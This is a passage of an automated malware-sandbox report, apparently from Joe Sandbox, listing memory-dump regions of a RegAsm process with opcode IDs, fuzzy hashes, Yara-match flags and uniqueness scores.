                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00F04C54,00F04CC4,00F00A9B,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F04C94
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: e2f8b3fc84afe77b2e44bd9eac774263979335adf19bdf2e5a41aedaa8eff26f
                                  • Instruction ID: 90778f157ef074656d7de284b4bab831f576b04e2021a8a1eff49e75729f027a
                                  • Opcode Fuzzy Hash: e2f8b3fc84afe77b2e44bd9eac774263979335adf19bdf2e5a41aedaa8eff26f
                                  • Instruction Fuzzy Hash: A4C092717E0300B6FA348A208D57F8A62159B90F00F30840877093C0C085F1B610C62C
                                  Uniqueness

                                  Uniqueness Score: 0.01%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: U_V^
                                  • API String ID: 0-4067383671
                                  • Opcode ID: 85777a71513600e3e29c6e652154f3f0b1e97fc89a8adcff28aedca148f1fead
                                  • Instruction ID: 76fda7769927cec924db61c821c414677c7e48281358352e10fd327a534030f0
                                  • Opcode Fuzzy Hash: 85777a71513600e3e29c6e652154f3f0b1e97fc89a8adcff28aedca148f1fead
                                  • Instruction Fuzzy Hash: D6119171F006049FD740EBB888417AEBBE6AFC4310F114679D10AEB391EF75A9458BD2
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: U_V^
                                  • API String ID: 0-4067383671
                                  • Opcode ID: 4dc2aa0c142fd944929b44c27bd9c63f721c301d7e716b2129c89b57275931cd
                                  • Instruction ID: 0ab76cdf493ff2680405ae8f663f1db4e562c2a4cec808f65236f6fafe22b2e9
                                  • Opcode Fuzzy Hash: 4dc2aa0c142fd944929b44c27bd9c63f721c301d7e716b2129c89b57275931cd
                                  • Instruction Fuzzy Hash: 7911A371A006059FD750DF7CC4417AEBBE6AFC4310F504279D14AEB391EB75A9418BD2
                                  Uniqueness

                                  Uniqueness Score: 100.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff98466c4a00ecd9709ac752a2581de62874e2e6f65aa5077147500a066a7356
                                  • Instruction ID: 70dc69fdb0f4b97fbce15d5e77ed716e237e8064fceceff23a70b247fe7965ae
                                  • Opcode Fuzzy Hash: ff98466c4a00ecd9709ac752a2581de62874e2e6f65aa5077147500a066a7356
                                  • Instruction Fuzzy Hash: 5391B270B503049BE744AB789896B6EBAE6ABD8700F24453CD606BF3D4CDB1EC418766
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2f928ffab120b89e90710096cca7bed558ad59750be05dbe6f63b1ac09e9b057
                                  • Instruction ID: 798e9fcc83ec51a96a24dfba9f3076509e3e603eee50750c8288927ffd25f537
                                  • Opcode Fuzzy Hash: 2f928ffab120b89e90710096cca7bed558ad59750be05dbe6f63b1ac09e9b057
                                  • Instruction Fuzzy Hash: 4A81B470B503059BE70497789892BBE6AD7ABD8700F24453CD606BF3C5CEB1EC458BA6
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 20ba68248cdb5ce8b305b2004b1c3f71efcce4c18a21cb71bc7c77372c374665
                                  • Instruction ID: 35ccb6cd11d532af3338312d2d2418a5ed5200cf0edc0bf477599c7aaf846463
                                  • Opcode Fuzzy Hash: 20ba68248cdb5ce8b305b2004b1c3f71efcce4c18a21cb71bc7c77372c374665
                                  • Instruction Fuzzy Hash: 9B817E34A00215CFD704DFA8EAD4A9D7BF2FF89345F1181A9E107AB2A6DB31AD05CB50
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0b543d4d91c5d5bc73564d16dac755df7b6335dc302aa35a543b69f6aed446c6
                                  • Instruction ID: 3479bbc1bfe8ac0ebb7cda58a64438b3274120aaf67479c63b57bcd1ae704f24
                                  • Opcode Fuzzy Hash: 0b543d4d91c5d5bc73564d16dac755df7b6335dc302aa35a543b69f6aed446c6
                                  • Instruction Fuzzy Hash: 6C51D339A00519CFDB14CF68D884A9DB7B2FB84320F528559D81AAB392D771BE45CB81
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c85fb67b60034c0b3a61f5b5829fabef3f181537dd9ea872f1bcc548db8b569e
                                  • Instruction ID: 60913f196ae5ee15722c0222a55931ba56c45f993ccaa07ddb3f3cac421bd480
                                  • Opcode Fuzzy Hash: c85fb67b60034c0b3a61f5b5829fabef3f181537dd9ea872f1bcc548db8b569e
                                  • Instruction Fuzzy Hash: D251D530E40216CFEB25DF74DD517AEBAB2AF84714F24402CD602AB291EF759C02CB91
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 896ded5dcf422ffd5756edff6727977c6a1c38685024e4956b62d60a3bf72f5d
                                  • Instruction ID: b5dd141490a65ea488d4fd244c264af66ad0cac25083f7e2acbbd5d11b2fdd6c
                                  • Opcode Fuzzy Hash: 896ded5dcf422ffd5756edff6727977c6a1c38685024e4956b62d60a3bf72f5d
                                  • Instruction Fuzzy Hash: 8B517C35B002108FD718DB38D9E4B5ABBF7AB88B15F118569EA179B392DB31EC05CB50
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3859b60b8c6e3b14f75766931f17df2f8c263747fafef2636391f22cdd1ba873
                                  • Instruction ID: 4198ae1df5ea46bb9e9e832f5d6ed94013339790ee1d53b3c2024128a1542bb4
                                  • Opcode Fuzzy Hash: 3859b60b8c6e3b14f75766931f17df2f8c263747fafef2636391f22cdd1ba873
                                  • Instruction Fuzzy Hash: 99511A35A00218DFDB14DFA8D990A9DBBB2FF89311F208569E412AB395DB31AC42CF50
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 46e40d90fcbdaed0a56aade54f3d86425feaf239f5dfa68a3a77b08cdde441d5
                                  • Instruction ID: 0a1d139d2406f49c12c4e4065c0a014235ec2022a1bae9b51ada04ce1cb43b95
                                  • Opcode Fuzzy Hash: 46e40d90fcbdaed0a56aade54f3d86425feaf239f5dfa68a3a77b08cdde441d5
                                  • Instruction Fuzzy Hash: 20416936B002158FD718DB38D994B5ABBF7AB88B05F518569E6079B381DB32EC05CB50
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 90251c28fd053f85b31b3087dfc981299f450edbc69126c8d2b7f29e96beeec7
                                  • Instruction ID: 36652fa23188cc1d2d6073c410d35588fe433256b3f1b17f0586f67f3f72348f
                                  • Opcode Fuzzy Hash: 90251c28fd053f85b31b3087dfc981299f450edbc69126c8d2b7f29e96beeec7
                                  • Instruction Fuzzy Hash: 72516034A00219CFD704DFB8E9D4A9DBBF2FF89744F1085A9E107AB266DB31A905CB51
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 53db7ffaee173444fc526bd31c486b5237af03c2171a0a91c744069df25dde01
                                  • Instruction ID: 5602c2dbe000d267abbdf2280af2044f043df1afaf4059e239ed644213b0e7be
                                  • Opcode Fuzzy Hash: 53db7ffaee173444fc526bd31c486b5237af03c2171a0a91c744069df25dde01
                                  • Instruction Fuzzy Hash: B341D636708221DBDB188A34DD90B857BB2EB84B10F154674E76BAB3D1D731EC51CB44
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 35b07da76fe93403cf428f90f0830075c5d140313b3cd1a7eee614b857fe77e2
                                  • Instruction ID: 299d50b4743672337190bc05f9981ee143feec833a9cbb1ed8f92a46a42fd29f
                                  • Opcode Fuzzy Hash: 35b07da76fe93403cf428f90f0830075c5d140313b3cd1a7eee614b857fe77e2
                                  • Instruction Fuzzy Hash: B5517030A00219DFD704DFB8EAD4A9DBBF2FF89345F1085A9E107AB256DB31A905CB50
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: adb1288721d82d4d517a4e39f39737cd0ea8a4bef3d07eac2f44893243c87dd6
                                  • Instruction ID: 0c946f567332570e2ddd0d1e814338b2ff3f225ae324851cbf6369c8ea4af95b
                                  • Opcode Fuzzy Hash: adb1288721d82d4d517a4e39f39737cd0ea8a4bef3d07eac2f44893243c87dd6
                                  • Instruction Fuzzy Hash: 61416832B002118FD718DB38D9D0B5ABBF3AB88B05F518569E6079B392DB32EC05CB50
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a2629e740983ee4e0ecae55c36e313e04350d0c04cccb5da68e035771572ca34
                                  • Instruction ID: 2db78d413a1bac5e7dd6b96caa77f8417b7f7de3f916442f74938f642ca2c522
                                  • Opcode Fuzzy Hash: a2629e740983ee4e0ecae55c36e313e04350d0c04cccb5da68e035771572ca34
                                  • Instruction Fuzzy Hash: 1A418F34B402548FDB48EB78D9507AD76E3AFC9700F6044A9C506AB392EB39AD42CB51
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ab802903367ef10f0fdb09c4e486a936fcb2a896ebaf32065924f42ac0c2db10
                                  • Instruction ID: 84eb8ffd581c8c87f946b48885814f80e6ad9324d79a7ffc48937dc705e21593
                                  • Opcode Fuzzy Hash: ab802903367ef10f0fdb09c4e486a936fcb2a896ebaf32065924f42ac0c2db10
                                  • Instruction Fuzzy Hash: 7E319F31B001248BCB08EB78D9E4A6EBBF7ABD8740B554568C907D7395DE34AD01C7A5
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 948a12bb1ce182b63a65d88af028298cceaed6ac9559fbdefea4ce235d0bd660
                                  • Instruction ID: a505ebc9b1e21d1a62faba338a62e8a6c6e3bb85435f4caa7894c96dcb5d2542
                                  • Opcode Fuzzy Hash: 948a12bb1ce182b63a65d88af028298cceaed6ac9559fbdefea4ce235d0bd660
                                  • Instruction Fuzzy Hash: 95F08C35B402508BEF08E7B8D4502EC62A7AFC9219B2008B8C1066B3D1DF3A9E02CB61
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fd407648182cab3c009ce4ba6a6b101a437cc5c65eb6fccbda08867362384626
                                  • Instruction ID: bca1c45bed5b7c0b108db00a28f9c41facc4bcfc5e7ef56c83080ba260e1a3a0
                                  • Opcode Fuzzy Hash: fd407648182cab3c009ce4ba6a6b101a437cc5c65eb6fccbda08867362384626
                                  • Instruction Fuzzy Hash: 4A01AD30900218CFCB20EFB8C9C0AAE7FB6FB85B00F40456AC50A97242D7315544CB91
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 80ad9391c69632aa3fd5331bf64eb1ca77c3e31a2c30088a611058dd85cabaf5
                                  • Instruction ID: ff2503cf1f0a5a70090bdbf2db7fda4b93a88655340458d0bc815a67152f7eff
                                  • Opcode Fuzzy Hash: 80ad9391c69632aa3fd5331bf64eb1ca77c3e31a2c30088a611058dd85cabaf5
                                  • Instruction Fuzzy Hash: B7F01D75E001199FCB40DFBCD8456DEBFF5EB98250F6001BAD509E7301E6359A018BE6
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8ad6c4a5d3ea2017d72147fdac2d37b9a8db54a9e5b597e6ec9e5ea85684d752
                                  • Instruction ID: e5c421eca5e07f409f8030a41472aa7255f3376d7333b688c7a17d9547ce42ea
                                  • Opcode Fuzzy Hash: 8ad6c4a5d3ea2017d72147fdac2d37b9a8db54a9e5b597e6ec9e5ea85684d752
                                  • Instruction Fuzzy Hash: 08F03A72E002299FCB40DFB99C402AEBBF5EB88690B124579D60AE3200E63059018BE0
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 414470c13e5bd3fe24203320d8a64426ed8765cc8491faf72f00a71e2493bb29
                                  • Instruction ID: 8bb6b33559c2c433e98bb1ecdd9f44f799989e23cebd716672a51953ef270c38
                                  • Opcode Fuzzy Hash: 414470c13e5bd3fe24203320d8a64426ed8765cc8491faf72f00a71e2493bb29
                                  • Instruction Fuzzy Hash: 73F02030E0425A5ACF04DEBEAC149DFBFF9DFE8222F4449B5D948E3141E931A81183E2
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320683231.000000001DB40000.00000040.00000040.sdmp, Offset: 1DB40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db40000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b0820154c3f26c0d41788179339f31418b5969b19dd37f7ea61e9393507a2475
                                  • Instruction ID: 3d292b34bcbb0ba491f2ca269463cd07a7224b6c8f4ed43f5521b3736811b127
                                  • Opcode Fuzzy Hash: b0820154c3f26c0d41788179339f31418b5969b19dd37f7ea61e9393507a2475
                                  • Instruction Fuzzy Hash: 9EF0EC35548685DFC306CB40D544F16FBA2FB89718F24C6ADE9490B762C7379823DA82
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320683231.000000001DB40000.00000040.00000040.sdmp, Offset: 1DB40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db40000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2ef9a42db8349f55a1aaf35add6623047cf65077ea77e063208ef9e32d989618
                                  • Instruction ID: 9ec19f38f91cf876f00f5ab16dd8433a34c233cf33eb286d7666e5fc4007c3e3
                                  • Opcode Fuzzy Hash: 2ef9a42db8349f55a1aaf35add6623047cf65077ea77e063208ef9e32d989618
                                  • Instruction Fuzzy Hash: 65E092B66006048BD650DF0AEC81462FBD4EB84630B08C47FDC0D8B701D639F504CEA5
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326364848.00000000204E0000.00000040.00000001.sdmp, Offset: 204E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204e0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8a313993b49b7cfa5a7b12ea8719a04bd1e811f5a05bb628b2a181c214ce49bc
                                  • Instruction ID: a3380f42ef716014e4a67cd4aded362591df780a1b1ef45c5fd1d05a5c9aee37
                                  • Opcode Fuzzy Hash: 8a313993b49b7cfa5a7b12ea8719a04bd1e811f5a05bb628b2a181c214ce49bc
                                  • Instruction Fuzzy Hash: 0DE0D8B65403006BD210DF069C86B23FB98DB90930F04C46BED085B342D575B514C9F5
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326364848.00000000204E0000.00000040.00000001.sdmp, Offset: 204E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204e0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7fcc65fca6bf5bc08fce65d7229c4634446aca2c622d5f31540427e3ef61cfc0
                                  • Instruction ID: 767e2a0469f02299736618e7ae63b56f2867455ec183355bbf416f3ca980bf53
                                  • Opcode Fuzzy Hash: 7fcc65fca6bf5bc08fce65d7229c4634446aca2c622d5f31540427e3ef61cfc0
                                  • Instruction Fuzzy Hash: 79E0D8B65002006BD210DF069C86B23FB98DB80930F04C45BED095B302D576B614CDE5
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24326364848.00000000204E0000.00000040.00000001.sdmp, Offset: 204E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_204e0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3a0728d03457e3c94523a9064dddb2b85a901eb1f3d52ea7f1588ddcdfab42a0
                                  • Instruction ID: c6a80e7c7158efe401e235a383ff054fbffdec685f37af4095b1ff0ee0f04854
                                  • Opcode Fuzzy Hash: 3a0728d03457e3c94523a9064dddb2b85a901eb1f3d52ea7f1588ddcdfab42a0
                                  • Instruction Fuzzy Hash: 56E0D8B65003046BD250DF069C86B23FB98DB40930F08C45BED095B302D576B514C9F5
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320432090.000000001DB22000.00000040.00000001.sdmp, Offset: 1DB22000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db22000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1d552fb3dc9fe129d876fd2a6dc1e1f40bb8a42c35a24f736aca98a70900b5ca
                                  • Instruction ID: 2dca046eb1cb13f76a76fe72f2c487e578205ecccafba4e6ab91efb7d5e51df1
                                  • Opcode Fuzzy Hash: 1d552fb3dc9fe129d876fd2a6dc1e1f40bb8a42c35a24f736aca98a70900b5ca
                                  • Instruction Fuzzy Hash: 6AE0D8B65402046BD210DF069C86B33FB58DB40930F04C557ED095B302D575B514CDF5
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 73372ddf18d5fa3b5218e3800255283148c254b6b6a706df76e43ac937989450
                                  • Instruction ID: 67597b798a50429080a72e7c2220b7cbfdf31bdf8f40ca01c70cb88b9c5f57ed
                                  • Opcode Fuzzy Hash: 73372ddf18d5fa3b5218e3800255283148c254b6b6a706df76e43ac937989450
                                  • Instruction Fuzzy Hash: A0D0A732250110CFC2045FB4C584F453BF9EB99A20B50859CE00FC3613CE78B4588701
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320272155.000000001DB12000.00000040.00000001.sdmp, Offset: 1DB12000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db12000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 688fdb15554ab4f98e0e7c262685f98f7b5fced2cfc6778bee7892e6ca9f6a38
                                  • Instruction ID: b4c22d6fbd1c8cc55283eb143cc074c21154ac2161a50cb69bde4aac7fed9807
                                  • Opcode Fuzzy Hash: 688fdb15554ab4f98e0e7c262685f98f7b5fced2cfc6778bee7892e6ca9f6a38
                                  • Instruction Fuzzy Hash: 37D05EB96046918FD3029E18D1E2BA53BD4AB92B14F4644FAA8018F763C768E581D201
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24320272155.000000001DB12000.00000040.00000001.sdmp, Offset: 1DB12000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1db12000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c06fa0147e6fa775c20270cc48eaece7b410ab7d35ab14cf6fb796f3b6dcfd4a
                                  • Instruction ID: 75f03b1032138adc8e528f4998b8b3bfc286d9e9281671bbb0ffec6687ec9b43
                                  • Opcode Fuzzy Hash: c06fa0147e6fa775c20270cc48eaece7b410ab7d35ab14cf6fb796f3b6dcfd4a
                                  • Instruction Fuzzy Hash: 52D05E756002814FDB01DE08E2D1F6937D8AB80B04F0244F8BC028F362C7B4D9C0D600
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 309b721594f5aeb93eeebfeb58abfbe9fc45ef6dd39bfa957b3b79d5845acaba
                                  • Instruction ID: 6a2546652d9e546f1a3ce9a16e86a078800b9a95bddfbbf26585eb4eb4a9f148
                                  • Opcode Fuzzy Hash: 309b721594f5aeb93eeebfeb58abfbe9fc45ef6dd39bfa957b3b79d5845acaba
                                  • Instruction Fuzzy Hash: 5EC01236F40004C7DF04F7F0F8851DCB374EA842257200C61D117A3041DF311A148711
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24323558317.000000001FEE0000.00000040.00000001.sdmp, Offset: 1FEE0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_1fee0000_RegAsm.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6809a6600e4ad008811920de9b67d3e606602a4e873f39f8e54ac121db8cdcf0
                                  • Instruction ID: ed44dccd74fdf5137b63766e97b9beac33a5c9f9cfcb0aaf1942a959e15f9286
                                  • Opcode Fuzzy Hash: 6809a6600e4ad008811920de9b67d3e606602a4e873f39f8e54ac121db8cdcf0
                                  • Instruction Fuzzy Hash:
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Non-executed Functions

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: aae17fba98d4bf99c1c74551a9e39b707c6f486f06c259c83d60bcf6ad55c139
                                  • Instruction ID: f879074a26d75de709c4038cb0b0d994f85ddf4f8e99a136bb9af4a01dee6f28
                                  • Opcode Fuzzy Hash: aae17fba98d4bf99c1c74551a9e39b707c6f486f06c259c83d60bcf6ad55c139
                                  • Instruction Fuzzy Hash: 25B1BE71700612EFD754DF28CC95BD6B3A4FF197A4F184329EC99932C1DB38A851ABA0
                                  Uniqueness

                                  Uniqueness Score: 0.00%

                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.24300444936.0000000000F00000.00000040.00000001.sdmp, Offset: 00F00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_f00000_RegAsm.jbxd
